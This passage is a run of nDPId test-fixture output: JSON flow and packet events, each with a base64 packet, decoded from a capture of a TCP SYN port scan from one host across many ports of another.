-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsZjgAAC4GtDqsEAAIQA2GNIzTAaHdU4MZAAAAAGACDAAq6wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsXNkAACsGwJmsEAAIQA2GNIzTH0vdU4MZAAAAAGACEAAJQQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs4KkAACwGO8msEAAIQA2GNIzTI1DdU4MZAAAAAGACBAARPAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsHMUAACYGBa6sEAAIQA2GNIzTFGrdU4MZAAAAAGACDAAYIgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsfkQAADQGli6sEAAIQA2GNIzTFiLdU4MZAAAAAGACBAAeagAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAs0YwAADMGQ+asEAAIQA2GNIzTB5vdU4MZAAAAAGACEAAg8QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAsph4AADQGblSsEAAIQA2GNIzTnQHdU4MZAAAAAGACBACXigAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAsS7UAACoG0r2sEAAIQA2GNIzTPozdU4MZAAAAAGACDADt\/wAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060803,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_packet_id":1,"flow_last_seen":1278275060803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060803,"pkt":"ACYLMQczACWzv5HuCABFAAAsqPsAADcGaHesEAAIQA2GNIzT0x3dU4MZAAAAAGACEABVbgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsxjsAADYGTDesEAAIQA2GNIzTIPvdU4MZAAAAAGACDAALkQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsFQcAADMGAGysEAAIQA2GNIzTD5LdU4MZAAAAAGACEAAY+gAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsW8oAADQGuKisEAAIQA2GNIzTBFndU4MZAAAAAGACBAAwMwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsd4EAADsGlfGsEAAIQA2GNIzSBFPdUoMYAAAAAGACEAAkPAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsT2YAADIGxwysEAAIQA2GNIzSAnzdUoMYAAAAAGACDAAqEwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsWvQAADMGun6sEAAIQA2GNIzSE77dUoMYAAAAAGACEAAU0QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAseRIAACwGo2CsEAAIQA2GNIzSBTbdUoMYAAAAAGACBAAvWQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsrV0AADcGZBWsEAAIQA2GNIzSA\/\/dUoMYAAAAAGACEAAkkAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs4YkAADEGNemsEAAIQA2GNIzSA4fdUoMYAAAAAGACCAAtCAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ20AADAG8QWsEAAIQA2GNIzSAGTdUoMYAAAAAGACBAA0KwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs1gMAADkGOW+sEAAIQA2GNIzSDnfdUoMYAAAAAGACCAAiGAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsVUAAADgGuzKsEAAIQA2GNIzSBATdUoMYAAAAAGACBAAwiwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsmTIAAC0GgkCsEAAIQA2GNIzSA4TdUoMYAAAAAGACCAAtCwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsR1MAACsG1h+sEAAIQA2GNIzSA2ndUoMYAAAAAGACEAAlJgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsFScAADsG+EusEAAIQA2GNIzSAHfdUoMYAAAAAGACEAAoGAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
